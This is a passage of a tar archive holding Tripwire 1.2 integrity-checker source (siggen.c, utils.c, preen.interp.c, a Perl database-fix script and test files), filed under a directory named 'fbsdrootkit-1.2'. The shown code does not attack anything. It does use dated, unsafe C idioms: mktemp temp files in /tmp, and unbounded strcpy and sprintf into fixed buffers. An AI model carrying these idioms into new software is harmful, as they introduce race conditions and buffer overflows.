leave all other entries alone\n"); fprintf(fpout, " h: Print inode information help message\n"); fprintf(fpout, " ?: Print this help message\n"); fprintf(fpout, "\n"); } static void updateentry_help(fpout) FILE *fpout; { (void) tw_help_print(fpout); } fbsdrootkit-1.2/tripwire-1.2/src/siggen.c100600 764 764 10704 5614754434 15543 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: siggen.c,v 1.14 1994/07/25 15:24:12 gkim Exp $"; #endif /* * siggen.c * * generate signatures for a given file. * * Gene Kim * Purdue University * October 14, 1992 */ #include "../include/config.h" #include #include #ifdef STDLIBH # include #endif #include #include #include #ifndef XENIX # include #else # include #endif /* XENIX */ #ifdef DIRENT # include #else # ifndef XENIX # include # else /* XENIX */ # include # endif /* XENIX */ #endif /* DIRENT */ #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #ifdef STRINGH #include #else #include #endif #include "../include/list.h" #include "../include/tripwire.h" #ifndef L_tmpnam # define L_tmpnam (unsigned int) MAXPATHLEN #endif extern int optind; int debuglevel = 0; char *mktemp(); int (*pf_signatures [NUM_SIGS]) () = { SIG0FUNC, SIG1FUNC, SIG2FUNC, SIG3FUNC, SIG4FUNC, SIG5FUNC, SIG6FUNC, SIG7FUNC, SIG8FUNC, SIG9FUNC }; int printhex = 0; int sigallget = 1; int sigvector[NUM_SIGS] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; char *signames[NUM_SIGS] = { SIG0NAME, SIG1NAME, SIG2NAME, SIG3NAME, SIG4NAME, SIG5NAME, SIG6NAME, SIG7NAME, SIG8NAME, SIG9NAME, }; int verbosity = 0; int quietmode = 0; char *tmpfilename = NULL; int readstdin = 0; char *progname; void usage() { int i; fprintf(stderr, "siggen: usage: [-0123456789qv] [-h] [ file ... ]\n"); fprintf(stderr, " (-h is to print signatures in hexadecimal. default is base-64.\n"); for (i = 0; i < sizeof(signames)/sizeof(char *); i++) { fprintf(stderr, "\tsig %d: %s\n", i, signames[i]); } exit(1); } int main(argc, argv) int argc; char *argv[]; { int i, c; int fd; int errors = 0; progname = argv[0]; optind = 1; while ((c = getopt(argc, argv, "0123456789aqvh")) != -1) { switch(c) { case '0': sigallget = 0; sigvector[0] = 1; break; case '1': sigallget = 0; sigvector[1] = 1; break; case '2': sigallget = 0; sigvector[2] = 1; break; case '3': sigallget = 0; sigvector[3] = 1; break; case '4': sigallget = 0; sigvector[4] = 1; break; case '5': sigallget = 0; sigvector[5] = 1; break; case '6': sigallget = 0; sigvector[6] = 1; break; case '7': sigallget = 0; sigvector[7] = 1; break; case '8': sigallget = 0; sigvector[8] = 1; break; case '9': sigallget = 0; sigvector[9] = 1; break; case 'a': sigallget = 1; break; case 'v': verbosity = 1; break; case 'q': quietmode = 1; break; case 'h': printhex = 1; break; case '?': default: usage(); exit(1); } } argc -= optind; argv += optind; if (argc == 0) readstdin = 1; for (i = 0; i < argc; i++) { if (strcmp(argv[i], "-") == 0) { readstdin = 1; continue; } else if ((fd = open(argv[i], O_RDONLY, 0)) < 0) { warn_with_err("siggen: skipping '%s'", argv[i]); errors++; continue; } if (argc > 1) printf("*** %s ***\n", argv[i]); if (siggen(fd) < 0) errors++; if (fd) close(fd); } if (readstdin) { FILE *fpout; /* generate temporary file name */ if ((tmpfilename = (char *) malloc(L_tmpnam + MAXPATHLEN)) == NULL) { perror("main: malloc()"); exit(1); }; (void) strcpy(tmpfilename, "/tmp/twzXXXXXX"); if ((char *) mktemp(tmpfilename) == NULL) { perror("siggen: mktemp()"); exit(1); } /* output */ if (!(fpout = fopen(tmpfilename, "w"))) { char err[1024]; sprintf(err, "main: fopen(%s)", tmpfilename); perror(err); exit(1); } /* copy */ while ((c = getc(stdin)) != EOF) putc(c, fpout); fclose(fpout); if ((fd = open(tmpfilename, O_RDONLY)) < 0) { perror("siggen: open"); exit(1); } if (siggen(fd) < 0) errors++; if (fd) close(fd); unlink(tmpfilename); } if (errors) exit(1); exit(0); } int siggen(fd) int fd; { char sigs[NUM_SIGS][SIG_MAX_LEN]; int i; /* collect signatures */ for (i = 0; i < NUM_SIGS; i++) { char *pc = sigs[i]; if (sigallget || sigvector[i]) { if ((*pf_signatures[i])(fd, pc, SIG_MAX_LEN) < 0) { return -1; } if (!quietmode) printf("sig%d: %-9s: %s\n", i, signames[i], sigs[i]); else printf("%s ", sigs[i]); } } if (quietmode) printf("\n"); return 0; } fbsdrootkit-1.2/tripwire-1.2/src/twdb_check.pl100700 764 764 7006 5627323151 16527 0ustar dfdf#!/usr/local/bin/perl # The purpose of this script is to match each database entry with # its "closest" tw.config entry. Discrepencies appear when database # entries are added, and currently, Tripwire does not remap existing # entries to newly added entries. # # This script is an interim measure to correct this database divergence. ## ## From tripwire.h ## ## /* database record format */ ## /* filename: (entrynumber, ignorevec, st_mode, st_ino, st_nlink, ## * st_uid, st_gid, st_size, ## * ltob64(statbuf->st_atime, vec64_a), ## * ltob64(statbuf->st_mtime, vec64_m), ## * ltob64(statbuf->st_ctime, vec64_c), sig0, sig1, ..., sig9 ## */ $usage = "usage: $0 "; $#ARGV != 1 && die $usage; # only one argument allowed ($Database = $ARGV[0]) || die $usage; # get name of db file $Back = $Database . ".BAK"; die "Will not clobber existing $Back (saved backup version).\n" if -e $Back; # Now, we create the backup file. We do this in stages. The first # stage involves linking the current file to the backup. We then # create a temp file to hold the output. Finally, when we are all # done, we unlink the original name and move the temporary to the # old name. $Database =~ m#^(.+)/[^/]+$#; $Temp = ($1 ? $1 : "./") . "tw.db_TEMP"; umask(077); link ($Database, $Back) || die "Failed to link $Database to $Back: $!"; open (TMPFD, ">$Temp") || die "Failed to open temporary file $Temp: $!"; ($Configfile = $ARGV[1]) || die $usage; # First we read in the configuration file, and remember the name of # each entry. # $entry[$i++] = ... # open(CONFIG, $Configfile) || die "Failed to open config file $Configfile\n"; while () { s/^ *//; if (m/^#/) { next; } chop; ($entry, $flags) = split; eval "\$eentry = qq#$entry#"; # expands \ddd form $entry = $eentry; #print "Found entry $entry\n"; $entry[$numentries] = $entry; $entrynums{$entry} = $numentries++; } # foreach dbentry { # foreach configentry { # assign score based on how maximal match # } # make sure entry(maximal match) is the entry(dbaseentry) # if not, correct # } # open(DBASE, $ARGV[0]); while () { m/^@@dbaseversion\s+(\d+)/ && do { next if $1 == 4; unlink($Temp, $Back); die "$Database is version $1, and I only know how to update version 4!"; }; next if (/^(#|@@)/); next if (/^@@/); @line = split(' ', $_, 6); $line[0] =~ s/#/\\#/g; $junk = $line[0]; eval "\$file = qq#$junk#"; # expands \ddd form $entrynum = ($line)[1]; # find longest substring match $longest = 0; for ($i = 0; $i < $numentries; $i++) { if ($file =~ m/$entry[$i]/) { if (length($entry[$i] > $longest)) { $longest = length($entry[$i]); $lentrymatch = $entry[$i]; } } } #print "entry=$longest: $file\n"; $realentrynum = $entrynums{$lentrymatch}; #print "entry=$realentrynum ($line[1]): $file\n"; if ($realentrynum != $line[1]) { #print "^^^^ Wow, it was wrong!!\n"; $_ = join(' ', (@line[0], $realentrynum, @line[2..5])); } else { $_ = join(' ', (@line[0..5])); } #if ($st_ino) { #$_ = join(' ', (@line[0..3], $st_ino, @line[5])); #} else { #warn "$file: lstat() failed: $! skipping...\n"; #} } continue { print TMPFD $_; } close TMPFD; unlink($Database) || warn "Failed to unlink old database file $Database: $!"; rename($Temp, $Database) || die "Failed to rename temporary file $Temp to $Database: $!"; fbsdrootkit-1.2/tripwire-1.2/src/utils.c100600 764 764 43530 5614763364 15434 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: utils.c,v 1.23 1994/07/25 16:23:16 gkim Exp $"; #endif /* * utils.c * * miscellaneous utilities for Tripwire * * Gene Kim * Purdue University */ #include "../include/config.h" #include "../include/byteorder.h" #include #include #include #if !defined(SYSV) || (SYSV > 3) # include #else # include #endif /* SYSV */ #ifdef STDLIBH #include #include #endif #include #ifdef STRINGH #include #else #include # if (!defined(strchr) && !defined(index)) # define strchr(s, c) index(s, c) # endif # if (!defined(memcpy) && !defined(bcopy)) # define memcpy(to, from, n) bcopy(from, to, n) # endif #endif #include #include #include #include #include #ifndef MAXHOSTNAMELEN #define MAXHOSTNAMELEN 64 #endif #ifndef XENIX # include #else # include #endif /* XENIX */ #ifndef GETHOSTNAME # include #endif #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #include "../include/list.h" #include "../include/tripwire.h" #ifndef SEEK_SET # define SEEK_SET L_SET #endif #ifndef L_tmpnam # define L_tmpnam (unsigned int) MAXPATHLEN #endif static void print_perm(); #ifndef S_IRGRP #define S_IRGRP (S_IREAD >> 3) #define S_IWGRP (S_IWRITE >> 3) #define S_IXGRP (S_IEXEC >> 3) #define S_IROTH (S_IREAD >> 6) #define S_IWOTH (S_IWRITE >> 6) #define S_IXOTH (S_IEXEC >> 6) #endif void warn_with_err(format, name) char *format, *name; { extern int errno; int real_errno = errno; char *string; if (!name) string = format; else { string = (char *) malloc((unsigned) (strlen(format)+strlen(name)+1)); if (!string) { fputs("Unexpected malloc() failure in 'warn_with_err'!\n", stderr); exit(-1); } sprintf(string, format, name); errno = real_errno; } perror(string); } void die_with_err(format, name) char *format, *name; { warn_with_err(format, name); exit(1); } /* * filename_hostname_expand(char **ps) * * expand any '@'s in the specified string to the hostname. * * Ex: "xxx_@_xxx" ---> "xxx_mentor.cc.purdue.edu_xxx" */ static char hostname[MAXHOSTNAMELEN]; void filename_hostname_expand(ps) char **ps; { char *s = *ps; char outpath[MAXPATHLEN+256]; char *pc; if (! *hostname) { /* we only need to do this once */ #ifndef GETHOSTNAME struct utsname sysinfo; if (uname(&sysinfo) < 0) die_with_err("filename_hostname_expand: uname()", (char *) NULL); (void) strcpy(hostname, sysinfo.nodename); #else /* GETHOSTNAME */ /* get the hostname */ if (gethostname(hostname, sizeof(hostname)) < 0) die_with_err("filename_hostname_expand: gethostname()", (char *) NULL); #endif /* GETHOSTNAME */ } /* is there a '@' in the filename? */ if ((pc = strchr(s, '@')) == NULL) { return; } /* copy the first part of the string */ (void) strncpy(outpath, s, pc-s); /* strncpy() doesn't guarantee null-terminated strings! */ outpath[pc-s] = '\0'; /* expand the '@' and copy the rest of the string */ (void) strcat(outpath, hostname); (void) strcat(outpath, pc+1); /* make our pointer point to the expanded string */ if ((pc = (char *) malloc((unsigned int) (strlen(outpath) + 1))) == NULL) die_with_err("filename_hostname_expand: malloc()", (char *) NULL); (void) strcpy(pc, outpath); *ps = pc; return; } /* * slash_count(char *pathname) * * count the number of slashes in a given pathname. This is used * to determine the priority of a given file entry when generating * the list of files. */ int slash_count (pathname) char *pathname; { register int count = 0; register char *pc; for (pc = pathname; *pc; pc++ ) if (*pc == '/') count++; return count; } /* * string_split_space(char *string, char *s, char *t) * * given (string), place the first word into (s), and the rest of * into (t). * * returns zero on success, -1 on failure. */ int string_split_space (string, s, t) char *string; char *s; char *t; { char *sp; /* * (char *sp) = the first space. s = {string[0..(sp-s-1)]} * t = {sp[1..end]} */ if ((sp = strchr(string, ' ')) == NULL) { SPDEBUG(10) fprintf(stderr, "string_split_space: string doesn't contain space!\n"); return -1; } /* don't forget to null-terminate the string w/strncpy() */ (void) strncpy(s, string, sp-string); s[sp-string] = '\0'; (void) strcpy(t, sp+1); return 0; } /* * int * string_split_ch(char *string, char *s, char *t, char ch) * * given (string), place the first word into (s), and the rest of * into (t), using (ch) as the field separator. (ala perl). */ int string_split_ch (string, s, t, ch) char *string; char *s; char *t; int ch; { char *sp; /* * (char *sp) = the first space. s = {string[0..(sp-s-1)]} * t = {sp[1..end]} */ if ((sp = strchr(string, ch)) == NULL) { (void) strcpy(s, string); t[0] = '\0'; return -1; } /* don't forget to null-terminate the string w/strncpy() */ (void) strncpy(s, string, sp-string); s[sp-string] = '\0'; (void) strcpy(t, sp+1); return 0; } /* * chop (char *s) * * chop off the last character in a string, ala Perl. */ void chop (s) char *s; { int slen; slen = strlen(s); s[slen-1] = '\0'; return; } /* * filename_escape_expand(char *filename) * * expand \xxx octal characters, metachacters, and known * C escape sequences. */ void filename_escape_expand (filename) char *filename; { int i = 0; static char filetmp[MAXPATHLEN+256]; int octal; register char *pcin = filename, *pcout = filetmp; /* * case I: it's not escaped * case II: it's a three digit octal number * case III: it's a standard C escape sequence * (\n, \r, \', \", \t, \b, \f) * (from Johnson, Stephen C., * "Yacc: Yet Another Compiler-Compiler") * case IV: it's one of our metacharacters {@#!|&()= } */ while (*pcin) { /* case I: it's not an escape */ if (*pcin != '\\') { *pcout++ = *pcin++; } /* case II: it's a three digit octal number */ else if (isdigit(*++pcin)) { /* read in the three characters */ for (octal = i = 0; i < 3 ; i++, pcin++) { octal *= 8; if (*pcin > '7' || *pcin < '0') { fprintf(stderr, "filename_escape_expand: bogus octal character (%c) in file `%s'!\n", *pcin, filename); exit(1); } else octal += *pcin-'0'; } /* warn of filenames with null's in them */ if (octal == 0) { fprintf(stderr, "tripwire: warning: null character in file `%s'!\n", filename); exit(1); } *pcout++ = octal & 0xff; } /* case III: it's a standard C escape sequence */ /* case IV: it's one of our escape characters */ else switch(*pcin) { case 'n': { *pcout++ = '\n'; break; } case 'r': { *pcout++ = '\r'; break; } case 't': { *pcout++ = '\t'; break; } case 'b': { *pcout++ = '\b'; break; } case 'f': { *pcout++ = '\f'; break; } case '\'': case '"': case '@': case '!': case '#': case '=': case ' ': case ')': case '(': case '&': case '|': case '\\': /* same as our default case... it's the character itself */ default: { *pcout++ = *pcin++; break; } } } /* null terminate the string */ *pcout++ = '\0'; (void) memcpy(filename, filetmp, pcout - filetmp); return; } /* * char * * filename_escape(char *filename) * * find any characters that must be escaped in the file name. */ char * filename_escape (filename) char *filename; { static char filetmp[MAXPATHLEN+256]; register char *pcin = filename, *pcout = filetmp; static char *octal_array[] = { "000", "001", "002", "003", "004", "005", "006", "007", "010", "011", "012", "013", "014", "015", "016", "017", "020", "021", "022", "023", "024", "025", "026", "027", "030", "031", "032", "033", "034", "035", "036", "037", "040", "041", "042", "043", "044", "045", "046", "047", "050", "051", "052", "053", "054", "055", "056", "057", "060", "061", "062", "063", "064", "065", "066", "067", "070", "071", "072", "073", "074", "075", "076", "077", "100", "101", "102", "103", "104", "105", "106", "107", "110", "111", "112", "113", "114", "115", "116", "117", "120", "121", "122", "123", "124", "125", "126", "127", "130", "131", "132", "133", "134", "135", "136", "137", "140", "141", "142", "143", "144", "145", "146", "147", "150", "151", "152", "153", "154", "155", "156", "157", "160", "161", "162", "163", "164", "165", "166", "167", "170", "171", "172", "173", "174", "175", "176", "177", }; register char *pccopy; /* these only matter if they are the first character */ if (*pcin == '!' || *pcin == '=' || *pcin == '#') { *pcout++ = '\\'; *pcout++ = *pcin++; } /* these must be replace everywhere in the filename */ while (*pcin) { if (isalnum(*pcin)) { *pcout++ = *pcin; } else if (iscntrl(*pcin)) { *pcout++ = '\\'; *pcout++ = *(pccopy = octal_array[(int)(*pcin)]); *pcout++ = *++pccopy; *pcout++ = *++pccopy; } else { switch(*pcin) { case '\\': case '\'': case '\"': case '@': case ' ': case '(': case ')': case '&': case '|': case '#': *pcout++ = '\\'; *pcout++ = *(pccopy = octal_array[(int)(*pcin)]); *pcout++ = *++pccopy; *pcout++ = *++pccopy; break; default: *pcout++ = *pcin; break; } } pcin++; } /* null terminate the string */ *pcout++ = '\0'; return filetmp; } #define NEWBASE64 #ifdef NEWBASE64 static char base64vec[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz:."; #else static char base64vec[] = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; #endif /* pltob64 -- walk through a vector of int32s, convert them to * network byte ordering, and then convert to base 64 * * this is the preferred interface to btob64. */ #define NUMTMPLONGS 1000 char * pltob64(pl, pcout, numlongs) uint32 *pl; char *pcout; int numlongs; { register int i; register uint32 *plto; uint32 larray[NUMTMPLONGS]; assert(numlongs < NUMTMPLONGS); /* we use our own ntohl() routines, but we have to do it in-place */ memcpy((char *) larray, (char *) pl, numlongs*sizeof(uint32)); for (i = 0, plto = larray; i < numlongs; i++) { bs_htonl(*plto++); } return btob64((unsigned char *) larray, (char *) pcout, numlongs*sizeof(uint32)*8); } /* btob64 -- convert arbitrary bits to base 64 string * * Input: bit array (represented as u_char array) * number of bits in the array * ptr-to-str for return string val * * This is high magic. Trust me. --spaf */ char * btob64(pcbitvec, pcout, numbits) register unsigned char *pcbitvec; register char *pcout; int numbits; { register unsigned int val; register int offset; unsigned char *pcorig = (unsigned char *) pcout; assert(sizeof(unsigned char) == 1); /* everything breaks otherwise */ assert(numbits > 0); val = *pcbitvec; offset = numbits % 6; /* how many bits initially? */ if (offset) { val >>= (8 - offset); *pcout++ = base64vec[val & 0x1f]; } for ( numbits -= offset; numbits > 0; offset += 6, numbits -= 6) { val = *pcbitvec; if (offset > 2) { offset -= 8; val <<= 8; val |= *++pcbitvec; } val >>= (2-offset); *pcout++ = base64vec[val & 0x3f]; } *pcout = '\0'; return (char *) pcorig; } #ifdef FOO char * ltob64(num, vec64) register uint32 num; char *vec64; { register char *p1 = vec64; register int i; /* build lsb -> msb */ for (i = 5; i >= 0; i--) { p1[i] = base64vec[num & 0x3f]; num >>= 6; } vec64[6] = 0; return vec64; } #endif /* * int32 * b64toi(char *vec) * * given a base-64 string, convert to a int32. */ int32 b64tol(vec) char *vec; { register char *pc; register int32 num = 0L; /* we use a different base-64 vector now to preseve zero's traditional * value. */ #ifdef NEWBASE64 for (pc = vec; *pc; pc++) { num <<= 6; /* 0 - 9 */ if (*pc >= '0' && *pc <= '9') num += (*pc - '0'); /* 0..9 = '0' .. '0' */ else if (*pc >= 'A' && *pc <= 'Z') num += (*pc - 'A' + 10); /* 10..35 = '65-55' .. '90-55' */ else if (*pc >= 'a' && *pc <= 'z') num += (*pc - 'a' + 36); /* 36..61 = '97-35' .. '122-61' */ else if (*pc == ':') num += 62; else if (*pc == '.') num += 63; else { fprintf(stderr, "b64tol: fatal error: unknown character '%c'.\n", *pc); exit(1); } } return num; #else for (pc = vec; *pc; pc++) { num <<= 6; num += *pc; if (*pc <= '9') num -= '.'; else if (*pc <= 'Z') num -= '5'; /* '5' == 'A' - 12 */ else num -= ';'; /* ';' == 'a' - 38 */ } return num; #endif } int32 oldb64tol(vec) char *vec; { register char *pc; register int32 num = 0L; for (pc = vec; *pc; pc++) { num <<= 6; num += *pc; if (*pc <= '9') num -= '.'; else if (*pc <= 'Z') num -= '5'; /* '5' == 'A' - 12 */ else num -= ';'; /* ';' == 'a' - 38 */ } return num; } /* * direntry_print(char *name, struct stat stabuf)) * * print out a pretty directory entry for the specified file * * this routine was taken from crc_check.c, written by Jon Zeeff * (zeeff@b-tech.ann-arbor.mi.us) * * hacked for use in Tripwire by Gene Kim. */ void direntry_print (name, statbuf, mode) char *name; struct stat statbuf; int mode; { struct passwd *entry; static char owner[20]; char a_time[50]; static int prev_uid = -9999; switch(mode) { case DIFF_ADDED: printf("added: "); break; case DIFF_CHANGED: printf("changed: "); break; case DIFF_DELETED: printf("deleted: "); break; } if (statbuf.st_uid != prev_uid) { entry = (struct passwd *)getpwuid((int) statbuf.st_uid); if (entry) (void) strcpy(owner, entry->pw_name); else (void) sprintf(owner, "%d", statbuf.st_uid); prev_uid = statbuf.st_uid; } /* if (statbuf.st_gid != prev_gid) { group_entry = getgrgid((int) statbuf.st_gid); if (group_entry) (void) strcpy(group, group_entry->gr_name); else (void) sprintf(group, "%d", statbuf.st_gid); prev_gid = statbuf.st_gid; } */ (void) strcpy(a_time, ctime(&statbuf.st_mtime)); a_time[24] = '\0'; print_perm((uint32)statbuf.st_mode); (void) printf(" %-9.9s %7d %s", owner, statbuf.st_size, a_time + 4); printf(" %s\n", name); } /* * This routine was taken from crc_check.c, written by Jon Zeeff * (zeeff@b-tech.ann-arbor.mi.us) * * hacked for use in Tripwire by Gene Kim. */ static void print_perm(perm) uint32 perm; { char string[20]; (void) strcpy(string, "----------"); switch (perm & S_IFMT) { case S_IFDIR: string[0] = 'd'; break; case S_IFBLK: string[0] = 'b'; break; case S_IFCHR: string[0] = 'c'; break; case S_IFIFO: string[0] = 'p'; break; #if !defined(SYSV) || (SYSV > 3) case S_IFLNK: string[0] = 'l'; #endif } if (perm & S_IREAD) string[1] = 'r'; if (perm & S_IWRITE) string[2] = 'w'; if (perm & S_ISUID && perm & S_IEXEC) string[3] = 's'; else if (perm & S_IEXEC) string[3] = 'x'; else if (perm & S_ISUID) string[3] = 'S'; if (perm & S_IRGRP) string[4] = 'r'; if (perm & S_IWGRP) string[5] = 'w'; if (perm & S_ISUID && perm & S_IXGRP) string[6] = 's'; else if (perm & S_IXGRP) string[6] = 'x'; else if (perm & S_ISUID) string[6] = 'l'; if (perm & S_IROTH) string[7] = 'r'; if (perm & S_IWOTH) string[8] = 'w'; if (perm & S_ISVTX && perm & S_IXOTH) string[9] = 't'; else if (perm & S_IXOTH) string[9] = 'x'; else if (perm & S_ISVTX) string[9] = 'T'; (void) printf("%s", string); } /* * generate a temporary filename, placing it into (s). we assume that * space is already allocated for (s). */ int fd_tempfilename_generate() { char tmp[MAXPATHLEN+256]; int fd; (void) strcpy(tmp, TEMPFILE_TEMPLATE); if ((char *) mktemp(tmp) == NULL) { perror("tempfilename_generate: mktemp()"); exit(1); } if ((fd = open(tmp, O_RDWR | O_CREAT, 0600)) < 0) { perror("tempfilename_generate: open()"); exit(1); } /* unlink right away to make sure no one can tamper with our file */ unlink(tmp); return fd; } /* * read the entirety of input from file descriptor, copying into a file in /tmp. * we unlink the file to prevent anyone from accessing it. * we then return a file descriptor to that file. */ #define BSIZE 4096 int fd_copy_to_tmp(fdin) int fdin; { int readin; int fdout; struct stat statbuf; char buf[BSIZE]; /* we don't need to copy from the fd if it's a regular file */ if (fstat(fdin, &statbuf) < 0) { die_with_err("fd_copy_to_tmp: fstat()", NULL); } if ((statbuf.st_mode & S_IFMT) == S_IFREG) return fdin; fdout = fd_tempfilename_generate(); while ((readin = read(fdin, buf, BSIZE)) != 0) { if (readin < 0) { char *pc = (char *) malloc(100); sprintf(pc, "%d", fdin); die_with_err("fd_copy_to_tmp: read(%d)", pc); exit(1); } if (write(fdout, buf, readin) != readin) { die_with_err("fd_copy_to_tmp: write()", NULL); } } close(fdin); if (lseek(fdout, 0, SEEK_SET) != 0) { die_with_err("fd_copy_to_tmp: lseek() rewind error!", NULL); } return fdout; } int file_copy_to_tmp(filename) char *filename; { int fdin, fdout; if ((fdin = open(filename, O_RDONLY)) < 0) { die_with_err("couldn't open %s", filename); } fdout = fd_copy_to_tmp(fdin); return fdout; } #ifdef TEST int debuglevel; main() { int i; char s[64][1024]; for (i = 0; i < 64; i++) { ltob64((int32) i, s[i]); printf("%d --> %s\n", i, s[i]); } for (i = 0; i < 64; i++) { int32 l; l = b64tol(s[i]); printf("%ld\n", l); } } #endif fbsdrootkit-1.2/tripwire-1.2/src/preen.interp.c.dist100600 764 764 6030 6273465264 17621 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: preen.interp.c,v 1.14 1994/04/04 00:34:40 gkim Exp $"; #endif /* * preen.interp.c * * interpret the diffs between the database files * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #endif #ifdef STRINGH #include #else #include #endif #include #ifdef __STDC__ # include # include #endif #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #include "../include/list.h" #include "../include/tripwire.h" /* the diff lists */ struct list *diff_added_list = NULL, *diff_deleted_list = NULL, *diff_changed_list = NULL; /* how many in each list */ int diff_added_num = 0, diff_changed_num = 0, diff_deleted_num = 0, diff_unignored_num = 0; /* * preen_interp(FILE *fpin) * * do the actual interpreation of the diff output, generated by * diffing the two database files. */ void preen_interp (fpin) FILE *fpin; { char s[1024]; char key[MAXPATHLEN+256], value[512]; struct list_elem *plist; if (!quietmode) fprintf(stderr, "### Phase 4: Searching for inconsistencies\n"); /* start reading in lines from the new database */ while (fgets(s, sizeof(s), fpin) != NULL) { char *oldvalue; static int countlines = 1; countlines++; /* is it a comment? */ if (s[0] == '#') continue; if (s[0] == '@' && s[1] == '@') continue; /* * if it's in the list: * flag as SEEN * a) if it's the same, next; * b) if it's different, it's CHANGED; * otherwise, * it's ADDED * * scan entire list, find all !SEEN * they're DELETED */ /* (this should never happen since it was already preprocessed!) */ if (string_split_space(s, key, value) < 0) { fprintf(stderr, "%s: fatal parse error in preprocessed database file, line %d\n!", progname, countlines); exit(1); } filename_escape_expand(key); /* if file is in saved database */ if ((oldvalue = list_lookup(key, &olddbase_list)) != NULL) { list_setflag(key, FLAG_SEEN, &olddbase_list); /* was it CHANGED? */ if (strcmp(value, oldvalue) != 0) { SPDEBUG(6) printf("--(changed %s)------vvv\n", key); SPDEBUG(6) printf(">%s>%s\n", oldvalue, value); list_set(key, value, 0, &diff_changed_list); diff_changed_num++; } /* else skip it */ else continue; } /* else it's been ADDED */ else { list_set(key, value, 0, &diff_added_list); diff_added_num++; } } /* look for DELETED entries */ if (list_open(&olddbase_list) < 0) { fprintf(stderr, "preen_interp: list_open() failed!\n"); exit(1); } while ((plist = list_get(&olddbase_list)) != NULL) { /* skip entries that have already been seen */ if (plist->flag & FLAG_SEEN) continue; list_set(plist->varname, plist->varvalue, 0, &diff_deleted_list); diff_deleted_num++; } if (list_close(&olddbase_list) < 0) { fprintf(stderr, "preen_interp: list_open() failed!\n"); exit(1); } return; } fbsdrootkit-1.2/tripwire-1.2/tests/ 40700 764 764 0 5630552017 14344 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/tests/testfiles/ 40700 764 764 0 5630552017 16346 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/tests/Makefile100600 764 764 1503 5503713714 16104 0ustar dfdf# $Id: Makefile,v 1.14 1993/12/15 23:03:40 genek Exp $ # # Tripwire test DIST=tripwire-1.1 SIGGEN=../src/siggen TESTDIR=./testfiles TEMPFILE=@@TRIPWIRE_TEST.0 TEST0KEY=test0.key HOSTNAME= all: OKSIGS test OKSIGS: $(SIGGEN) createfiles $(SHELL) test0.sh $(SIGGEN) $(TESTDIR) $(TEMPFILE) $(TEST0KEY) @rm -rf $(TESTDIR)/t_file* createfiles: createfiles.c @$(CC) $(CFLAGS) -o createfiles createfiles.c $(LIBS) OKEXER: @$(SHELL) test.twpre.sh @$(SHELL) test.update.sh @$(SHELL) test.inter.sh @$(SHELL) test.escape.sh @rm -rf databases @touch OKEXER test: ../src/tripwire OKSIGS OKEXER @HOST=`echo $(HOSTNAME)`; \ CURRPATH=`pwd`; \ $(SHELL) test1.sh "$(HOSTNAME)" $(DIST) ../src/tripwire: (cd ..; make all) clean: rm -f tw.db_TEST.@ @tw.config createfiles $(TEMPFILE) OKSIGS $(TESTDIR)/t_file* OKEXER clobber: clean fbsdrootkit-1.2/tripwire-1.2/tests/createfiles.c100600 764 764 4201 5435554623 17102 0ustar dfdf#include #include #define TESTFILEDIR "./testfiles/" /* @@(string) indicates special test that doesn't use literal strings. We * interpret these down below. */ char *pc_strings[] = { "", "a", "abc", "message digest", "abcdefghijklmnopqrstuvwxyz", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", "12345678901234567890123456789012345678901234567890123456789012345678901234567890", "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq", "1\n", "12\n", "123\n", "1234\n", "12345\n", "123456\n", "1234567\n", "123456789\n", "The theory of quantum electrodynamics has now lasted for\n\ more than fifty years, and has been tested more and more\n\ accurately over a wider and wider range of conditions.\n\ At the present time I can proudly say that there is no\n\ significant difference between experiment and theory!\n\ \n\ Just to give you an idea of how the theory has been put\n\ through the wringer, I'll give you some recent numbers:\n\ experiments have Dirac's number at 1.00115965221 (with\n\ an uncertainty of about five times as much). To give you\n\ a feeling for the accuracy of these numbers, it comes\n\ out something like this: If you were to measure the\n\ distance from Los Angeles to New York to this accuracy,\n\ it would be exact to the thickness of a human hair.\n\ That's how delicately quantum electrodynamics has, in the\n\ past fifty years, been checked -- both theoretically and\n\ experimentally.\n", }; main(argc, argv) int argc; char *argv[]; { int i; char *pc; int slen; int fd; char filename[100]; char *dir; if (argc == 2) { dir = argv[1]; mkdir(dir, 0777); } for (i = 0; i < sizeof(pc_strings)/sizeof(char *); i++) { pc = pc_strings[i]; sprintf(filename, "%s/t_file%d", TESTFILEDIR, i); if ((fd = open(filename, O_CREAT|O_WRONLY, 0666)) < 0) { perror("open()"); exit(1); } /* check for special tests */ if (strncmp(pc, "@@", 2) == 0) { continue; } /* else, it's a literal string */ slen = strlen(pc); if (write(fd, pc, slen) != slen) { fputs("incomplete write!", stderr); exit(1); } close(fd); } exit(0); } fbsdrootkit-1.2/tripwire-1.2/tests/test.escape.sh100700 764 764 16243 5502473071 17244 0ustar dfdf#!/bin/sh # $Id: test.escape.sh,v 1.2 1993/12/12 01:39:05 genek Exp $ # # Rigorous Tripwire functionality test suite # # Gene Kim # Purdue University # ME=$0 TMPDIR=/tmp/twtest TWCONFIG=$TMPDIR/tw.config TWDB=$TMPDIR/tw.db TRIPWIRE="../src/tripwire -loosedir -c $TWCONFIG -d $TWDB -i all " NEWFILE="$TMPDIR/d1/@@NEWFILE" OLDFILE="$TMPDIR/@@OLDFILE" GROWFILE="$TMPDIR/grow" STATFILE="/tmp/twstat"; SAVETWDB=/tmp/twXXX LOGFILE=/tmp/TWLOG STATUSADD=2 # exit status of Tripwire STATUSDEL=4 STATUSCHA=8 MYRUN=/tmp/twrun.sh MYCHECK=/tmp/twcheck.sh MYCREATE=/tmp/twcreate.sh MYINIT=/tmp/twinit.sh MYCREATETWCONF=/tmp/twctwconf.sh cat << GHK === $ME: DESCRIPTION This is similar to the Tripwire update tests, but escaped 